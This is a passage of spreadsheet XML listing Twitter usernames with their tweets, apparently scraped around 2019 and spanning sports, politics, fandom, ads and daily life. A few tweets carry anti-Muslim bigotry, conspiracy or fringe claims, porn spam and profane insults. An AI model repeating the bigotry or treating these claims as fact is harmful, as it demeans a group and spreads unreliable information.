    <t>@C4DNerd @RedMakuzawa Their constant whining and screaming made me incredibly uncomfortable, especially Zenitsu. I'm actually surprised many of these episodes passed QC. Someone had to convince me to watch through the spider forest arc, I even put it as 'dropped' on MAL for a bit lol.</t>
  </si>
  <si>
    <t>nopeaceofmind</t>
  </si>
  <si>
    <t>@alvkeisha okay but i’m saying, in a time in where there’s an issue in your community and you’re trashing someone because they’re talking about it seems weird. but i guess</t>
  </si>
  <si>
    <t>villandan</t>
  </si>
  <si>
    <t>@OFAHMusical Had a fab time on Saturday watching the show. I absolutely loved it. Grew up with OFAH and found it quite emotional. Brilliant acting by all. Bonjour!</t>
  </si>
  <si>
    <t>ramirezromario1</t>
  </si>
  <si>
    <t>Lol why spend $1000 on the new iPhone when it’s not even 5g capable</t>
  </si>
  <si>
    <t>talialikeitis</t>
  </si>
  <si>
    <t>For every TYRANNICAL bill this government tries to pass, buy a new gun or at least another box of ammo.</t>
  </si>
  <si>
    <t>jojoluvs18</t>
  </si>
  <si>
    <t>Mornin Twitterville! ☕☕☕☀🌤72° &amp; breezy. Nice, comfortable day in the hood. 🙋👋👋👋🐪🐫 https://t.co/uScMLW1rJs</t>
  </si>
  <si>
    <t>FactDesire</t>
  </si>
  <si>
    <t>Be proud of yourself for how far you have come, and never stop pushing to be the best you can be.</t>
  </si>
  <si>
    <t>fotoboyzevents</t>
  </si>
  <si>
    <t>Giant Coloring Book We print out a Giant 8’x8′ Coloring Book Page and bring Giant Sharpies of all colors. Partygoers choose a section to color and by the end of the event, a beautiful picture has been created! You can keep the picture after the party if you’d like. https://t.co/mIrlYLl5EC</t>
  </si>
  <si>
    <t>ishabeww</t>
  </si>
  <si>
    <t>@NinodaFilipino I talk to 0 LMFAOO</t>
  </si>
  <si>
    <t>Mr_Tony_Green</t>
  </si>
  <si>
    <t>The latest Tony Green's Daily News! https://t.co/cbY12ERvXv Thanks to @roundbarrel @UnisonDave @LivingstonDaily</t>
  </si>
  <si>
    <t>BlueBird1827</t>
  </si>
  <si>
    <t>@melsedits As a huge Destiel shipper i approve of this video😃🥰damn they're just the hottest and cutest together, i wish it was cannon too.</t>
  </si>
  <si>
    <t>oui_oui_bella</t>
  </si>
  <si>
    <t>Does it LOOK like I want to go out? #tooearly #goaway #stinkeye #frenchie #frenchbulldog #dogsofinstagram https://t.co/xjjdG5Go88</t>
  </si>
  <si>
    <t>3one</t>
  </si>
  <si>
    <t>Hey @RCSD some adults were drinking a beer on their porch and someone tossed a gram of weed on the ground. GET OVER YOURSELF AND LEAVE THEM ALONE BULLY. #livepd</t>
  </si>
  <si>
    <t>tiabbea</t>
  </si>
  <si>
    <t>@TallTattedNFit Pure stupidity. He wasn’t people that are already fit for pics</t>
  </si>
  <si>
    <t>Taniabanks24</t>
  </si>
  <si>
    <t>@fortmyers4trump @realDonaldTrump Trump is nuts, I've got my finger on the nuclear trigger and I keep forgetting how I got here, where I am and what I'm suppose to be doing. Anatomy of a Great Negotiator.</t>
  </si>
  <si>
    <t>mandiedekine</t>
  </si>
  <si>
    <t>@profLynette I took a hard pass on that one..too much gun violence in my city to chance it even for my love of harry potter 😒</t>
  </si>
  <si>
    <t>tropicalsushii</t>
  </si>
  <si>
    <t>@Nyv_Vrielle None of them can, that’s the trick 👀😂😂😂</t>
  </si>
  <si>
    <t>MattGar17672044</t>
  </si>
  <si>
    <t>It was just a few weeks ago the Cubs couldn’t be beat at https://t.co/dY00MFlDzV</t>
  </si>
  <si>
    <t>LichtenStrange</t>
  </si>
  <si>
    <t>Here's a look at the Leablade and Lunatic stickers and repeated design https://t.co/fruR2wzTEC</t>
  </si>
  <si>
    <t>_lisaaalim</t>
  </si>
  <si>
    <t>I really feel like I’m the only person out my friend group that’s never gonna get married 😐</t>
  </si>
  <si>
    <t>chight</t>
  </si>
  <si>
    <t>That’s it, no work for a week and I have a head cold</t>
  </si>
  <si>
    <t>anthony27556002</t>
  </si>
  <si>
    <t>The power of the people is far greater than the people in power. People just don’t realise it yet. Once they realise it’s nothing more than a kakistocracy, then collectively we will take that power from them!</t>
  </si>
  <si>
    <t>mpastry</t>
  </si>
  <si>
    <t>@KIPPSI1 @Martamendoza718 Boy, I must be worshipping the wrong God 🙄🙄🙄</t>
  </si>
  <si>
    <t>JonGlesing</t>
  </si>
  <si>
    <t>@DougGriffMAX983 If @cubs oust Joe Maddon there’s a term for that; it’s called getting “Bill Malloried.”</t>
  </si>
  <si>
    <t>Lindsay1948</t>
  </si>
  <si>
    <t>@USMCLiberal She is considerably better than he, and a cutie pie to boot.</t>
  </si>
  <si>
    <t>briccianaxo</t>
  </si>
  <si>
    <t>I’m a super to myself person unless I know you. Especially women. I can’t help it 🥴</t>
  </si>
  <si>
    <t>joyrott</t>
  </si>
  <si>
    <t>@drawandstrike @Solmemes1 ????? what chemical weapons??? that's already been proven false and you warmongers just want death and a reason to kill shame on all of you and shame on @realDonaldTrump for attacking Syria pull our troops out of the middle east and let them live or die on their own</t>
  </si>
  <si>
    <t>fneudecker</t>
  </si>
  <si>
    <t>Ariz. high court says Christians artists can’t be forced to make same-sex wedding invitations https://t.co/WQNIH4H8YB</t>
  </si>
  <si>
    <t>DontWatchWill</t>
  </si>
  <si>
    <t>@pil3zofsmil3z Yea he was wild for that</t>
  </si>
  <si>
    <t>belindapachecoo</t>
  </si>
  <si>
    <t>Weird convo I heard today on my morning walk some girl was talking to her mom and she was telling her that she told her friend to open her legs and her friend told her she couldn’t lol after I heard that I just started running I really didn’t want to hear the whole story lol</t>
  </si>
  <si>
    <t>ComicsNowCast</t>
  </si>
  <si>
    <t>Supernatural mystery series #CriminalMacabre returns this December from @darkhorsecomics @steveniles @gynemeth78 and @blambot https://t.co/8J4gSZThrS</t>
  </si>
  <si>
    <t>TDBank_US</t>
  </si>
  <si>
    <t>@DirIsaacCharles This is most definitely not the experience we want for you and we'd like to learn more. Please send us a DM with additional details so we can look into this. (noacct#splz). ^TM</t>
  </si>
  <si>
    <t>lymeforacure</t>
  </si>
  <si>
    <t>No one understands Lyme disease - The Japan Times https://t.co/Dk1yZtVoLm https://t.co/8nOXHmli8x</t>
  </si>
  <si>
    <t>CVTILEANDSTONE</t>
  </si>
  <si>
    <t>The C.V. Tile &amp; Stone team works with over 100 companies that produce the world’s finest tile and stone, cabinets, countertops, pavers, flooring, and more. These established relationships with vendors mean that you can rest assured... https://t.co/YHPyNVSyGB</t>
  </si>
  <si>
    <t>kyleezie</t>
  </si>
  <si>
    <t>oooh i forgot desean back with the eagles again. he popped off</t>
  </si>
  <si>
    <t>jonesrich</t>
  </si>
  <si>
    <t>@realDonaldTrump tell us again about seeing thousands cheer when the towers fell</t>
  </si>
  <si>
    <t>REAdvocateToday</t>
  </si>
  <si>
    <t>Is Your House “Priced to Sell Immediately”? https://t.co/MuL0NzFhd2 https://t.co/NA0sdk3T7q</t>
  </si>
  <si>
    <t>amyslogue</t>
  </si>
  <si>
    <t>The Pineapple Board @CBLindenSchool led me to see this challenging MIF lesson in @KristenRittenh1 6th grade classroom. Phenomenal strategies and critical thinking skills demonstrated by these students! https://t.co/QoGb3Hwur3</t>
  </si>
  <si>
    <t>iamharley5</t>
  </si>
  <si>
    <t>@DoitJones Wow..so now cause i wanna bebaround you i was holding you back from going out and having friends..i knew you didnt like to be around me..yup keep letting all the truth out..these feelings right here is the main reason we not together</t>
  </si>
  <si>
    <t>jimiesalaska</t>
  </si>
  <si>
    <t>There’s chasing a bag and then there’s literally chasing a bag like me 🤪</t>
  </si>
  <si>
    <t>skulptduggery</t>
  </si>
  <si>
    <t>Visit our page at: https://t.co/JI5aRfJweU if you’d like to have one of these #longonegulch Rawhide figures! @TaraBillinger @CountZachulaaa #lgg #figure #collectibles https://t.co/XhYrz5Mrhu</t>
  </si>
  <si>
    <t>steveHNH</t>
  </si>
  <si>
    <t>@thebriandunaway We're ready to believe you</t>
  </si>
  <si>
    <t>grizbro</t>
  </si>
  <si>
    <t>@Eskimos Meanwhile at McMahon stadium a truck drives by and backfires, Calgary thinking its the final gun leave the field. 5 plays later Edmonton kicks a field goal.</t>
  </si>
  <si>
    <t>1PureAlt</t>
  </si>
  <si>
    <t>Your favorite music : Running Up That Hill by @megmyers ** 24/7 pop/indie/alt awesomeness at https://t.co/vBhuwZ2ONu Buy song https://t.co/53jnEWgNiu https://t.co/yDL5gV4NSR</t>
  </si>
  <si>
    <t>SkkoolWorld</t>
  </si>
  <si>
    <t>"Klass In Session Podcast" EPISODE #16 NOW UP‼ Pick your platform below 👇🏾😎 https://t.co/t5I9kysFjF https://t.co/ATjOmIsowR https://t.co/T1CAuyyHnc https://t.co/GJYh4d9kU4 #Skkool #Podcast #KlassInSessionPodcast #motivation #inspiration https://t.co/Xlh1mW4srh</t>
  </si>
  <si>
    <t>xeothian</t>
  </si>
  <si>
    <t>@LewdDragon5 Thank you for this https://t.co/iFAyVlGDPE</t>
  </si>
  <si>
    <t>slbeesradio</t>
  </si>
  <si>
    <t>@zach_b34 My favorite was the one he hit in Missoula st the end of overtime.</t>
  </si>
  <si>
    <t>@SanketBas72, thanks. Stay tuned. We’ll send a reminder before the #AppleEvent on 10 September at 10:30 pm IST. Reply #unsubscribe to opt out. https://t.co/mdFsImdCQA</t>
  </si>
  <si>
    <t>matt_chandler</t>
  </si>
  <si>
    <t>@EthanBaugher @nbarbettini @jasonsbarr @Austen Well just you wait until you start getting the $8.99 Senior Special at your local buffet! I hear it’s *life changing*</t>
  </si>
  <si>
    <t>abbiewight</t>
  </si>
  <si>
    <t>@lauryndonaldx @aarn4president Right well he has time to grow into it</t>
  </si>
  <si>
    <t>AGramuglia</t>
  </si>
  <si>
    <t>@AlexBaxterScot1 Not to mention continued involvement with Dragon Ball.</t>
  </si>
  <si>
    <t>kawarthaNOW</t>
  </si>
  <si>
    <t>Tue Oct 1 -&gt; @goodlovelies bring their trademark harmonies to #Ptbo. Juno Award-winning trio performs @TheMarketHall @downtownPtbo. Our interview w/ singer &amp; guitarist Caroline Brooks - https://t.co/aBtJ0pk2ky https://t.co/m63W5BsVq1</t>
  </si>
  <si>
    <t>dugskinz1</t>
  </si>
  <si>
    <t>That car is more fucked up than my credit. #LivePD</t>
  </si>
  <si>
    <t>greeneyedboy89</t>
  </si>
  <si>
    <t>@Bull_Diggy Tragic mate. Hope I don’t have to wait 11 years for joint custody 😭</t>
  </si>
  <si>
    <t>OlSkoolG</t>
  </si>
  <si>
    <t>#cuomoprimetime @RudyGiuliani You are one of the biggest sellouts!! What an asshole.</t>
  </si>
  <si>
    <t>luxuryguletnet</t>
  </si>
  <si>
    <t>Bedia Sultan gulet accommodates 10 special guests in 5 magnificent cabins comprising of 2 master, 2 double, and 1 twin. GSM / WhatsApp: +44 7765 89 0351 https://t.co/OogF95oShT #yachtcharter #guletcruises #bluecruise https://t.co/KmuZeERYD7</t>
  </si>
  <si>
    <t>Stowe1989</t>
  </si>
  <si>
    <t>@BillOReilly Not a terror attack Bill when Saudi Arabia is at war with its neighbor. I am not buying the current administration boogie man story...</t>
  </si>
  <si>
    <t>calumsmyth_</t>
  </si>
  <si>
    <t>@mayluux @SkySportsPL How can you criticise his tactics when the players have literally come out and said they’re not doing exactly what he wants just yet</t>
  </si>
  <si>
    <t>DigDoug</t>
  </si>
  <si>
    <t>@keithpille I did that with Underground Railroad too. I’m guessing i should pick up the new one then?</t>
  </si>
  <si>
    <t>Bruple67</t>
  </si>
  <si>
    <t>Visiting familiar haunts and favorite places can be encouragin... More for Leo https://t.co/YVU35cosoE</t>
  </si>
  <si>
    <t>tonestradamus</t>
  </si>
  <si>
    <t>@mcast285 Really they had me hooked from the first scene, I loved the pacing</t>
  </si>
  <si>
    <t>id_teach</t>
  </si>
  <si>
    <t>Started the work to gamify our LMS today. It's a hero's journey, but hopeful we'll slay the monster in the end. #gamification #elearning #LMS</t>
  </si>
  <si>
    <t>ronfromsandiego</t>
  </si>
  <si>
    <t>@BooksRule54 @semperdiced Some people murder abortion doctors. Should we ban abortion to appease fringe murderers?</t>
  </si>
  <si>
    <t>GodHere3</t>
  </si>
  <si>
    <t>@AngelaHamilton8 Highlighting and re-iterating what's already out there is useful. Taking evidence to council meetings to expose the truth could help. Iain Malcolm being challenged about his behaviour with @UKLabour as well? @LGOmbudsman</t>
  </si>
  <si>
    <t>Kolvencia</t>
  </si>
  <si>
    <t>Watched one of Evan Edinger's videos about ads and now the go compare man is re-ingrained into my brain. It only took 8 years for me to forget about him the first time.</t>
  </si>
  <si>
    <t>eudaleks</t>
  </si>
  <si>
    <t>@virdi_gursh Name and shame them .</t>
  </si>
  <si>
    <t>Adelphiabalis</t>
  </si>
  <si>
    <t>Join us on Sunday, October 6th at 4 pm for a Murder Mystery Dinner Show..."Crime of Thrones." https://t.co/oCwuo1yPun https://t.co/oCwuo1yPun</t>
  </si>
  <si>
    <t>BKHtsPatch</t>
  </si>
  <si>
    <t>NYC Pizza Run Returns To Fort Greene: What You Need To Know https://t.co/xPf3jDRZGg https://t.co/eJ7Ie2tyrz</t>
  </si>
  <si>
    <t>Loop1Systems</t>
  </si>
  <si>
    <t>There's less than a month away till Chicago #SWUG. We're going to be there. Our CEO @billfitz73 is going to be there. Are you? Let us know if you are, because our team would be delighted to meet you face-to-face! ___ Learn more about the event: https://t.co/07EvNQ5tXi https://t.co/1C1hEI1NYp</t>
  </si>
  <si>
    <t>04nbod</t>
  </si>
  <si>
    <t>@CandyAppleAlly @ibrill I think all the music was replaced on the DVD. Now with 100% less Avril Lavigne</t>
  </si>
  <si>
    <t>Bobgotbored</t>
  </si>
  <si>
    <t>@alicejo5 @brogevans @Krissieeeeeeeee I can only ride my luck for so long....</t>
  </si>
  <si>
    <t>geoffwood</t>
  </si>
  <si>
    <t>My regular reminder that “bringing out the chains” is the dumbest thing about football. Stopping the game to measure a very specific distance between two subjective spots is just theater. Officials should just call it one way or the other, like everything else they do.</t>
  </si>
  <si>
    <t>Fazzz86</t>
  </si>
  <si>
    <t>@SHABAZGIL I don't know abut others but I'm personally Very disappointed the way things happening in NEYAPAKISTAN I'm hardcore fan of #PMIK but can't justify sahiwal and salahuddin I'm actually ashamed of being a supporter of PTI now .. We just need justice for poor</t>
  </si>
  <si>
    <t>_dralaterdzo</t>
  </si>
  <si>
    <t>@TrishPalmerYVR They have some of the worlds best soccer players, doubt basketball will be such a big deal. Having been in India for months at a time they can watch NBA basketball anytime on TV. The Harlem Globetrotters would be more live.</t>
  </si>
  <si>
    <t>brookfielddeuce</t>
  </si>
  <si>
    <t>@Dame_Lillard said “your idol’s idol so in a way you still look up to me” That’s when the dish got spicy 🔥</t>
  </si>
  <si>
    <t>SoldByAce</t>
  </si>
  <si>
    <t>140 W Hartel, 6310 Delaware Ext, Sour Lake, Texas, 77659 #keytoallyourrealestateneeds #sourlake Aislinn Phelan / Krystyn Harlow 📱 409-828-1214 Keller Williams Realty - The Phelan Group The Phelan Group is the KEY to all ... https://t.co/XQplAyfhoK https://t.co/wQn5EunVCN</t>
  </si>
  <si>
    <t>morganOPINES</t>
  </si>
  <si>
    <t>Challenges can turn you into a stronger person who others admi... More for Aquarius https://t.co/DmDF0GxIcX</t>
  </si>
  <si>
    <t>lakota_collins</t>
  </si>
  <si>
    <t>It took my almost 2 years to realize I was in love with you, from the first time I saw you to the time I got to know you, but where has that gotten me? Exactly no where. Biggest mistake or biggest gain? Tbh I dont know anymore at this point...Welcome to my Ted Talk of my life....</t>
  </si>
  <si>
    <t>WorthyNews2</t>
  </si>
  <si>
    <t>Chris Duncan, World Series champ for St. Louis Cardinals, succumbs to brain cancer #money #makemoney #earnmoney #news https://t.co/vGuwuUL7K1 https://t.co/5EvTLtwM2w https://t.co/LpK6UgCpt0</t>
  </si>
  <si>
    <t>bri72592</t>
  </si>
  <si>
    <t>@WigsandWisdom Whats there to be disappointed in? A strong, body positive, independent, resilient, classically trained artist with a lot of money and a good heart? @lizzo</t>
  </si>
  <si>
    <t>KasierisCan</t>
  </si>
  <si>
    <t>#TrudeauMustGo and take his #Buttshit with him! And Climate Barbie has to go too. They are economic saboteurs. https://t.co/ctAfRrytra</t>
  </si>
  <si>
    <t>JeffAHamilton</t>
  </si>
  <si>
    <t>@CoryjTaylor Top 3 for sure but it probably takes the top spot for me as well (Horizon 2nd, God of War 3rd)</t>
  </si>
  <si>
    <t>km_janay</t>
  </si>
  <si>
    <t>Y’all I’m so mad. My dad made me wait over a week to buy plane tickets so “he can find better” (I did not ask him to do this nor did I want to). Now I’m paying $85 more than I would have before</t>
  </si>
  <si>
    <t>ItsTheBandCLE</t>
  </si>
  <si>
    <t>@BilldeBlasio Thanks for joining the #YangGang!</t>
  </si>
  <si>
    <t>RVS_Principal</t>
  </si>
  <si>
    <t>RVS parents are happy for school to begin! #Hazletproud #firstdayofschool https://t.co/TuARmqQLWy</t>
  </si>
  <si>
    <t>Kenozombie</t>
  </si>
  <si>
    <t>@ErikWemple A fox or wsj reporter would have been fired. It’s nice to be a be a Democrat. Like being in the womb and sitting in 99 degree fluid feeling comfortable that no one can hurt you.</t>
  </si>
  <si>
    <t>FiveWivesVodka</t>
  </si>
  <si>
    <t>Five Wives has a subtle sweetness and smooth finish, making it the perfect #vodka for all of your favorite drinks. Need some inspo? Check out our full list of #cocktails here: https://t.co/dc4w365Nld https://t.co/a3tIhD1nEu</t>
  </si>
  <si>
    <t>SilverFoxOO7</t>
  </si>
  <si>
    <t>Hey @SamHarrisOrg &amp; @billmaher, look up the word "Taqiyya" &amp; then tell us how we can trust/believe ANY MUSLIM!!!</t>
  </si>
  <si>
    <t>LetsMaui</t>
  </si>
  <si>
    <t>Tupac is still alive and CCTV 'proves' he switched places with a body double before infamous ... https://t.co/MJM7YTy1Y6 #maui</t>
  </si>
  <si>
    <t>ColtonHills_PE</t>
  </si>
  <si>
    <t>Congratulations to the Year 7 footballers who have been selected to attend @WolvesSchools trials. ⏰ 9.30am start 🏟 @newacad 🏅 Saturday 28th September Please see Mr Jones for more information. #ColtonHillsPE #CHCS https://t.co/V3QgdkUUc0</t>
  </si>
  <si>
    <t>Nickimular</t>
  </si>
  <si>
    <t>FREE PORN VIDEO - HD QUALITY DO NOT trust people that put pizza rolls in the microwave ..if they don’t care about their taste buds you think they care about you? #sex #porn https://t.co/eS8SzzVfCd</t>
  </si>
  <si>
    <t>HAfikomen</t>
  </si>
  <si>
    <t>@simon_schama As is increasingly the case, British Jews are forced into wondering whether this is down to executive carelessness or deliberate provocation, otherwise known as Jew baiting. We’re just trying to survive, like everyone else. Why must we be constantly mistreated?</t>
  </si>
  <si>
    <t>gregorymarler</t>
  </si>
  <si>
    <t>You do not need to have specialist knowledge/skills to join a working group. You only need to volunteer your time to OpenStreetMap in a different way. #sotm2019</t>
  </si>
  <si>
    <t>DrMShahidAKhan</t>
  </si>
  <si>
    <t>@karishmaAli22 @pontecorvoste Proud on your activities and contribution for raising Pakistan flag</t>
  </si>
  <si>
    <t>JSlackyy</t>
  </si>
  <si>
    <t>@ThePeterMc You’re playing on New Zealand lmfao clam the fuck down</t>
  </si>
  <si>
    <t>ScottMWest</t>
  </si>
  <si>
    <t>@Boobafett69 I appreciate that about a lot of the mutants on here, but I also appreciate your calling this shit out. Scumbags.</t>
  </si>
  <si>
    <t>UnitarianUCV</t>
  </si>
  <si>
    <t>New singing group had its first gathering today! 1 people showed up. Thanks Glenn @ Vancouver Unitarians https://t.co/M8gdBqfJ5x</t>
  </si>
  <si>
    <t>The_AndroidStar</t>
  </si>
  <si>
    <t>@NBCNews Once again a nutjob ran amok shooting numerous people in a mindless rampage in Texas an "open carry" state. So the idea of people openly walking around with loaded guns will prevent such violence has been shown to be absurd! If nothing else; these mass shootings proves otherwise! https://t.co/VLcfTH6xiw</t>
  </si>
  <si>
    <t>RsStickle</t>
  </si>
  <si>
    <t>@CommanderCrissy @StanningAJLee Twitter Trolls got nothing better to do. Blocked them.</t>
  </si>
  <si>
    <t>Paradox47401010</t>
  </si>
  <si>
    <t>@SecretAgentTree @Jackaboy1398 Oh man...…. that bed is going to feel SO good, I'm sure.</t>
  </si>
  <si>
    <t>jessica_medders</t>
  </si>
  <si>
    <t>@brobinson436 @melissax1125 The Maury Show started in 1991 which was 4 years before I was born. He was in his 50s then.</t>
  </si>
  <si>
    <t>Juqavies_P</t>
  </si>
  <si>
    <t>@LeRuseBird Up air though</t>
  </si>
  <si>
    <t>FloOMahony</t>
  </si>
  <si>
    <t>@TheTeddyLamb Also it was vegetarian so it was awful from the start</t>
  </si>
  <si>
    <t>theseanybx_</t>
  </si>
  <si>
    <t>@TeamRivers Lost for words.....:-|</t>
  </si>
  <si>
    <t>1776_DoOrDie</t>
  </si>
  <si>
    <t>@ABC Government controlled healthcare. When does the government do anything right?</t>
  </si>
  <si>
    <t>aquariun9</t>
  </si>
  <si>
    <t>An easier way to study hard and a chance to win a $1,500 Reward are here when you sign up for bartleby and enter the back to school sweeps! NoPurchNec #bartlebybts #sweepstakes https://t.co/sZEXRhyOin</t>
  </si>
  <si>
    <t>kennydar</t>
  </si>
  <si>
    <t>@atrupar @RoyBlunt Roy Blunt has just admitted he is an ignorant sycophant without integrity. Unfit for office of any kind.</t>
  </si>
  <si>
    <t>Gordo_3217</t>
  </si>
  <si>
    <t>I want the key to the city.</t>
  </si>
  <si>
    <t>freaky_fred32</t>
  </si>
  <si>
    <t>@MelaniMinni hey baby come in to my dm, you'd like to have some deal with me</t>
  </si>
  <si>
    <t>Icepacphoto</t>
  </si>
  <si>
    <t>@SweetBabyJamiee I think it be more fun walking around somewhere like the zoo , Ripley , museum , hockey Hall of Fame</t>
  </si>
  <si>
    <t>alexmd2</t>
  </si>
  <si>
    <t>@stylistic_seven @bushiname @AlterViggo @Tesla "I confess that in 1901, I said to my brother Orville that man would not fly for 50 years." Wilbur Wright.</t>
  </si>
  <si>
    <t>lookupbeyond1</t>
  </si>
  <si>
    <t>@Thales_Alenia_S @thalesgroup Hope it helps your engineers. This research paper found out a discrepancy between simple calculations based on orbital mechanics and eternal free fall of orbiting bodies: https://t.co/SjH4eqcrel It seems the eternal free fall does not work.</t>
  </si>
  <si>
    <t>CloverkinArt</t>
  </si>
  <si>
    <t>Rant. I named my dog Bruni bcuz she is brown, it's Italian, and unique. Thank you, Disney for now making everyone think we named her after your salamander in Frozen 2. #ugh https://t.co/oJ95Y78XZQ</t>
  </si>
  <si>
    <t>araliahunt</t>
  </si>
  <si>
    <t>Some important highlights from a recent voyage to higher (and cooler) altitudes! https://t.co/xdG9Kmvmr1</t>
  </si>
  <si>
    <t>hannbecks</t>
  </si>
  <si>
    <t>@BeckyLynchWWE @GlblCtzn stunning legend🤩 can’t wait for sunday🧡</t>
  </si>
  <si>
    <t>FitRich4Life</t>
  </si>
  <si>
    <t>I am going to tell you the exact strategy to actually bring in more cash on-line https://t.co/xhPjy1uH6O https://t.co/R3qyfKjI56</t>
  </si>
  <si>
    <t>implicitditto</t>
  </si>
  <si>
    <t>@willhutcheson Welcome... would love to collaborate with you on some photos!</t>
  </si>
  <si>
    <t>Glayvorkia</t>
  </si>
  <si>
    <t>@MichaelMAGAUSN My simple observation from this, stupid is what stupid does. And dead eyes are not good on children</t>
  </si>
  <si>
    <t>NEWYORKCITYKEN</t>
  </si>
  <si>
    <t>.@lizzo's 'Truth Hurts' is officially the No. 1 song in the country, two years after its initial release https://t.co/DoqMTESwq7</t>
  </si>
  <si>
    <t>TMFanSupport</t>
  </si>
  <si>
    <t>@RobbWuddog Hello. Please send us a DM with the email address you used, so that we may assist with accessing your account. Thank You! - AC �</t>
  </si>
  <si>
    <t>lasharona</t>
  </si>
  <si>
    <t>@senatemajldr You liar, you have done the exact opposite of that. Does the name Merrick Garland strike a bell? Not to mention how you pushed Kavanaugh in without proper investigation. Who are you kidding, maybe some MAGats, but not me.</t>
  </si>
  <si>
    <t>kristensheft</t>
  </si>
  <si>
    <t>@Joe_Fann Ummmmm. No. Pizza is so bad the next day</t>
  </si>
  <si>
    <t>Just_Moi_x</t>
  </si>
  <si>
    <t>@nat_rakmomma Looks good hun and I'm sure he appreciated it ❤️❤️</t>
  </si>
  <si>
    <t>policrits</t>
  </si>
  <si>
    <t>@hopingforachang @LindseyGrahamSC @seanhannity Deep State Rinos Time to primary the lot of them</t>
  </si>
  <si>
    <t>priasun</t>
  </si>
  <si>
    <t>@ThePlumLineGS A lot of these are certainly possible but seem far-fetched. A Court that rules based on these arguments has certainly gone extremely partisan, and reform would be justified.</t>
  </si>
  <si>
    <t>nutman456</t>
  </si>
  <si>
    <t>@TzaousiosNIKA @Steven_Hyden Have you ever listened to a rap song in your life? What would you consider music then</t>
  </si>
  <si>
    <t>speedyegbert</t>
  </si>
  <si>
    <t>@coffsunee i’m omw to a climate change protest! fuck that tho</t>
  </si>
  <si>
    <t>MyMariaHomes</t>
  </si>
  <si>
    <t>Indoor and outdoor charm work together in harmony for this #luxuryhome. #archilovers https://t.co/LvUMFDGFYt https://t.co/OTTkppEzIk</t>
  </si>
  <si>
    <t>bizmotivator</t>
  </si>
  <si>
    <t>Learn from experiences and make changes. Never allow your ego to overpower wisdom. #decisions #wisdom #choices https://t.co/cxBrQYa2su</t>
  </si>
  <si>
    <t>DFWDamn</t>
  </si>
  <si>
    <t>Big Tuck protecting his toy because he knows I'm about to grab it! #TuckerTuesday https://t.co/vXykIt1oZe</t>
  </si>
  <si>
    <t>TheDailyRecord</t>
  </si>
  <si>
    <t>Dover’s offense awoke in a big way almost immediately after the restart, using its big-play aerial attack to flummox the Generals and prevail 21-16, continuing its undefeated start. Meanwhile, Wooster remains without a win, falling to 0-3. https://t.co/35of3CzCrn</t>
  </si>
  <si>
    <t>steveconsultsp1</t>
  </si>
  <si>
    <t>It's 7 O'Clock On The Big 8 " how many remember CKLW Canada Radio and TV? Smoked a Pin and turned on Free Spotify My Daily Mix Thingy 3 and " Raggo " by Kings of Leon provoked THIS. It's 7:08 now. @ Wendy's https://t.co/Na7W9QJibQ</t>
  </si>
  <si>
    <t>@DurgeshKeshar14, it’s on. The #AppleEvent is about to get started. Watch it live: https://t.co/yLa2e4Xr2R Reply #unsubscribe to opt out.</t>
  </si>
  <si>
    <t>sikingthegreat1</t>
  </si>
  <si>
    <t>@PerryChsu let me explain: the hong kong police is above the law</t>
  </si>
  <si>
    <t>MRLGonzo</t>
  </si>
  <si>
    <t>@yashar @moorehn I needed Heidi in the early 2000s.</t>
  </si>
  <si>
    <t>The_GDP_</t>
  </si>
  <si>
    <t>@realDonaldTrump blows dogs for wine change</t>
  </si>
  <si>
    <t>KeepinIt_Leel</t>
  </si>
  <si>
    <t>I had the same book bag from 7th-10th grade and that’s cuz I stopped bringing a book bag to school by 11th grade</t>
  </si>
  <si>
    <t>rynarayos</t>
  </si>
  <si>
    <t>@juuullliiaaaaa @plsgata Also offer for me as well or fuck offfff</t>
  </si>
  <si>
    <t>Biggs_301</t>
  </si>
  <si>
    <t>👍 on @YouTube: JANITOR BOUT TO PUT JESS TO WORK | CONTROL GAMEPLAY #2 https://t.co/bXfDzRiitG</t>
  </si>
  <si>
    <t>AnthonyLower</t>
  </si>
  <si>
    <t>@saragoldrickrab Condolences to you and to everyone who loved Aunt Beck.</t>
  </si>
  <si>
    <t>soulfulsista</t>
  </si>
  <si>
    <t>@peasnharmony Yep. They’re the castles of fairytales. Simply majestic.</t>
  </si>
  <si>
    <t>kevinlockett</t>
  </si>
  <si>
    <t>@mcuban Hi! My eBook The Digital Handbook 2020 will be FREE on Amazon for the next three days at this link https://t.co/R8V69frrIh. Feel free to share if you like.</t>
  </si>
  <si>
    <t>alyssa_lauren98</t>
  </si>
  <si>
    <t>Shain just told us Sheila went and sat on our porch for 45 minutes today at the farm looking for us, I'm officially done with this week and I'm bailing</t>
  </si>
  <si>
    <t>CSAPrepStar</t>
  </si>
  <si>
    <t>@EYG_Hollywood PrepStar has identified you as a college prospect. Step 1 complete the athletic questionnaire: https://t.co/6Pe5rXAoaA - Step 2 have a parent call today to schedule your scholarship interview @ 818-225-7300 ex. 24 Thx, Coach Duva!</t>
  </si>
  <si>
    <t>infinitelyEASY</t>
  </si>
  <si>
    <t>@TheWarMonitor Trump ain’t going no where iam not a trump supporter but yall gotta realize that huge problems, and scandals enough to give any sane person a heart attack just seem to bounce off this mother fucker. But if dems blow there load wth impeachment it’s gunna be trump 2020</t>
  </si>
  <si>
    <t>shcc1993</t>
  </si>
  <si>
    <t>Join us tomorrow morning at 9AM. Worshipping our great God is the best way to start the week! Join us and bring a friend. See you tomorrow! https://t.co/Rd2e0Z4Fyk</t>
  </si>
  <si>
    <t>dotfras</t>
  </si>
  <si>
    <t>@MattLegg I think it’s deeper. You can’t not die. You can’t hide behind muscles. Numbers don’t tell the full story. Are we either prolonging the unavoidable or enjoying the blip of time we have? A lot of people have an unhealthy relationship with themselves</t>
  </si>
  <si>
    <t>MondongoFacts</t>
  </si>
  <si>
    <t>Queen Victoria would use marijuana to relieve menstrual cramps.</t>
  </si>
  <si>
    <t>rissatard</t>
  </si>
  <si>
    <t>i think i hurt my arm at work today and i’m so mad about it, it hurts to much and i don’t have any medicine 😢</t>
  </si>
  <si>
    <t>promisejxmin</t>
  </si>
  <si>
    <t>i can never save money, I HAVE THE URGE TO BUY ALBUMS SOMEBODY TELL ME TO SAVE! 😭</t>
  </si>
  <si>
    <t>caseycramerrr</t>
  </si>
  <si>
    <t>Happy birthday to the coolest old dude I know @Floydtrbucklejr. Glad I get to call you a friend.</t>
  </si>
  <si>
    <t>kalebaldado</t>
  </si>
  <si>
    <t>@lolenisi I hope you’re not talking about the paramore song</t>
  </si>
  <si>
    <t>Sharpeguns1959</t>
  </si>
  <si>
